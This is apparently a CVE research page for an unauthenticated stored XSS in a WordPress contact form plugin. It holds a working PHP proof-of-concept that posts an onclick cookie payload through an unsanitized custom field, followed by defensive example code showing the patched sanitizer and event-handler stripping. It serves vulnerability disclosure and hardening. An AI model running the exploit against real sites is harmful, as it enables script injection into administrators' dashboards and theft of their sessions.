// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-1454 - Responsive Contact Form Builder & Lead Generation Plugin <= 2.0.1 - Unauthenticated Stored Cross-Site Scripting

$target_url = 'http://vulnerable-wordpress-site.com';

// Step 1: Identify a form ID
// This PoC assumes form ID 1 exists. In real scenarios, enumerate via exposed forms.
$form_id = 1;

// Step 2: Craft malicious payload
// The payload uses an anchor tag with onclick attribute allowed by the vulnerable wp_kses filter
$payload = '<a href="#" onclick="alert(document.cookie)">Click Me</a>';

// Step 3: Construct POST data
// The field name must NOT match the whitelisted patterns in lfb_lead_sanitize()
// Using 'customfield_' prefix bypasses the original sanitization
$post_data = array(
    'action' => 'Save_Form_Data',
    '_wpnonce' => 'dummy_nonce', // Nonce validation occurs but can be obtained from frontend
    'fdata' => http_build_query(array(
        'hidden_field' => $form_id,
        'customfield_1' => $payload, // This field type bypasses sanitization
        'g-recaptcha-response' => '', // Empty if captcha disabled
        'action' => 'Save_Form_Data'
    ))
);

// Step 4: Send exploit request to admin-ajax.php
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Step 5: Check response
if ($http_code == 200 && strpos($response, 'INVAILD') === false) {
    echo "[+] Payload likely injected successfully.\n";
    echo "[+] Visit $target_url/wp-admin/admin.php?page=all-leads to trigger XSS.\n";
} else {
    echo "[-] Injection may have failed. Response: $response\n";
}

?>
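The two defects the PoC relies on (a sanitizer that only touches field keys matching a known-type whitelist, and an output filter that allows an onclick attribute) are easiest to see side by side with their corrected forms. The block below is an added illustration written for this page; it is not the plugin's code, and the lfb_lead_sanitize() / expanded_alowed_tags() functions named in the advisory are not reproduced. All demo_* function names are hypothetical, the LFB_DEMO_KNOWN_TYPES list is taken from the field types the advisory says the whitelist covered, and demo_sanitize_text() is a stand-in for WordPress's sanitize_text_field() so the script runs under plain PHP (7.4+) with no WordPress install.

```php
<?php
// Added example for CVE-2026-1454 (not the plugin's code). Shows a
// whitelist-gated per-field sanitizer beside a default-deny version, and an
// allowed-tags table with event-handler attributes removed.

// Field types the original whitelist handled explicitly (per the advisory).
const LFB_DEMO_KNOWN_TYPES = ['name', 'text', 'radio', 'option', 'email',
    'number', 'message', 'textarea', 'date', 'dob', 'url', 'checkbox'];

// Stand-in for WordPress sanitize_text_field() (assumption: tags stripped,
// control characters dropped, whitespace collapsed is close enough here).
function demo_sanitize_text(string $value): string {
    $value = strip_tags($value);
    $value = preg_replace('/[\x00-\x1f\x7f]/', '', $value);
    return trim(preg_replace('/\s+/', ' ', $value));
}

// True when the field key begins with a known type name; this is the kind of
// prefix check a whitelist-only sanitizer uses to decide whether to act.
function demo_is_known_field(string $key): bool {
    foreach (LFB_DEMO_KNOWN_TYPES as $type) {
        if (stripos($key, $type) === 0) {
            return true;
        }
    }
    return false;
}

// Vulnerable shape: a key outside the whitelist is stored exactly as received.
function demo_sanitize_lead_whitelist(array $fields): array {
    $out = [];
    foreach ($fields as $key => $value) {
        $out[$key] = demo_is_known_field($key) ? demo_sanitize_text((string) $value) : $value;
    }
    return $out;
}

// Hardened shape (the idea behind the patch's lfb_lead_sanitize_all()):
// type-specific sanitizers are a refinement, and every other value falls
// through to a default sanitizer instead of passing untouched.
function demo_sanitize_lead_all(array $fields): array {
    $out = [];
    foreach ($fields as $key => $value) {
        $value = (string) $value;
        if (stripos($key, 'email') === 0) {
            $out[$key] = filter_var($value, FILTER_SANITIZE_EMAIL) ?: '';
        } elseif (stripos($key, 'url') === 0) {
            $out[$key] = filter_var($value, FILTER_SANITIZE_URL) ?: '';
        } else {
            $out[$key] = demo_sanitize_text($value); // default-deny fallback
        }
    }
    return $out;
}

// Output side: an allowed-tags table handed to wp_kses() must not carry any
// on* attribute, since wp_kses keeps whatever the table permits.
function demo_strip_event_handlers(array $allowed_tags): array {
    foreach ($allowed_tags as $tag => $attrs) {
        $allowed_tags[$tag] = array_filter(
            $attrs,
            fn($attr) => stripos((string) $attr, 'on') !== 0,
            ARRAY_FILTER_USE_KEY
        );
    }
    return $allowed_tags;
}

// Constructed sample submission: one whitelisted key and one custom key
// carrying the same anchor payload shape the PoC above uses.
$submission = [
    'name_1'        => 'Alice',
    'customfield_1' => '<a href="#" onclick="alert(document.cookie)">Click Me</a>',
];

echo "whitelist-only sanitizer: ";
var_dump(demo_sanitize_lead_whitelist($submission)['customfield_1']); // markup survives
echo "default-deny sanitizer:   ";
var_dump(demo_sanitize_lead_all($submission)['customfield_1']);       // only the link text survives

// Constructed allowed-tags table of the shape wp_kses() accepts.
$allowed = ['a' => ['href' => true, 'title' => true, 'onclick' => true]];
print_r(demo_strip_event_handlers($allowed)); // onclick removed, href/title kept
```

Both layers matter independently: the default-deny sanitizer stops the markup from ever reaching the database, and the attribute filter means that lead data already stored before the patch cannot execute script when the dashboard renders it. When auditing a similar plugin, check that every branch of the field-type switch has a fallback and grep the allowed-tags table for attribute names beginning with `on`.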
